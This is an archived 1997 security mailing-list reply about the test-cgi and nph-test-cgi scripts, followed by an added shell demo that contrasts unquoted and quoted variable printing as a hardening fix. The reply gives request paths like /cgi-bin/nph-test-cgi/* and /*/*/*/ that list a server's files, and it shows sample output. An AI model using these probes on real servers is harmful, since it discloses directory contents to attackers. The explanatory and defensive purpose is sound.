[3940] in WWW Security List Archive
RE: test-cgi and nph-test-cgi
daemon@ATHENA.MIT.EDU (Luke Th. Bullock)
Wed Jan 8 18:36:36 1997
In-Reply-To: <199612110615.AAA10111@home.vicksburg.com>
Date: Wed, 08 Jan 1997 19:38:29 +0100 (GMT+0100)
From: "Luke Th. Bullock" <lucc@powertech.no>
To: dscan <bhazard@vicksburg.com>
Cc: www-security@ns2.rutgers.edu
Errors-To: owner-www-security@ns2.rutgers.edu
On 11-Dec-96 The Guru dscan spake, and I quote:
>"/cgi-bin/test/cgi/*" can give an attacker valuable information about the
>server, like list the directory in the machine and list the files in the
>cgi-bin directory. On the other hand, when run like this "/cgi-bin/nph-test-cgi/*"
>you'll also see in the "PATH_TRANSLATED" line a list of the html files the
interesting yes.. take a look at the output of this one. You could get an entire
listing of the system, adding /*/*/*/ to the path, _if_ you bother to sit around
and wait for it. :)
----------- INSERTED FILE -----------------
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = Apache/1.2b4
SERVER_NAME = localhost
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
PATH_INFO = /cdrom/docs/catalog/ ## HERE I DELETED THE PATH ##
PATH_TRANSLATED = /var/lib/httpd/htdocs/*/*/*/ ## Notice this line ##
SCRIPT_NAME = /cgi-bin/nph-test-cgi
QUERY_STRING =
REMOTE_HOST = localhost
REMOTE_ADDR = 127.0.0.1
REMOTE_USER =
CONTENT_TYPE =
CONTENT_LENGTH =
~~~
. Luke Th. Bullock - aka Lucc .................................== ...
. lucc@powertech.no - Powertech Information Systems .......... || ...
. lbullock@tycho.com - Tycho SoftWorks (Marvin BBS) ......... / \ ..
. http://www.powertech.no/~lucc/ ........................... VSOP .
`=='
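
The listing behaviour discussed in this message, as an added example that is not part of the original post or of the test-cgi script itself: it assumes the report lines are produced by echoing request variables with unquoted shell expansion, and shows the weak form beside the quoted, hardened form. The function names and the temporary document root are constructed for the demonstration.

```shell
#!/bin/sh
# Constructed demo: an unquoted variable in a CGI report line lets a "*"
# taken from the request path be expanded by the shell into file names.

# Weak form (assumed shape of the report line): the expansion is unquoted,
# so the shell performs pathname expansion (globbing) on the value.
report_unquoted() {
    echo PATH_TRANSLATED = $PATH_TRANSLATED
}

# Hardened form: the value is quoted and printed literally, so the "*"
# stays a "*" and no directory contents are disclosed.
report_quoted() {
    printf 'PATH_TRANSLATED = %s\n' "$PATH_TRANSLATED"
}

# Build a constructed document root and print both report lines for it.
demo() {
    docroot=$(mktemp -d) || return 1
    mkdir "$docroot/private"
    : > "$docroot/index.html"
    : > "$docroot/private/notes.html"

    # The value the server would derive from a request path ending in "/*".
    PATH_TRANSLATED="$docroot/*"

    printf 'unquoted: %s\n' "$(report_unquoted)"
    printf 'quoted:   %s\n' "$(report_quoted)"

    rm -rf "$docroot"
}

demo
```

The same quoting rule applies to every variable such a script prints; removing test scripts from production cgi-bin directories removes the exposure entirely.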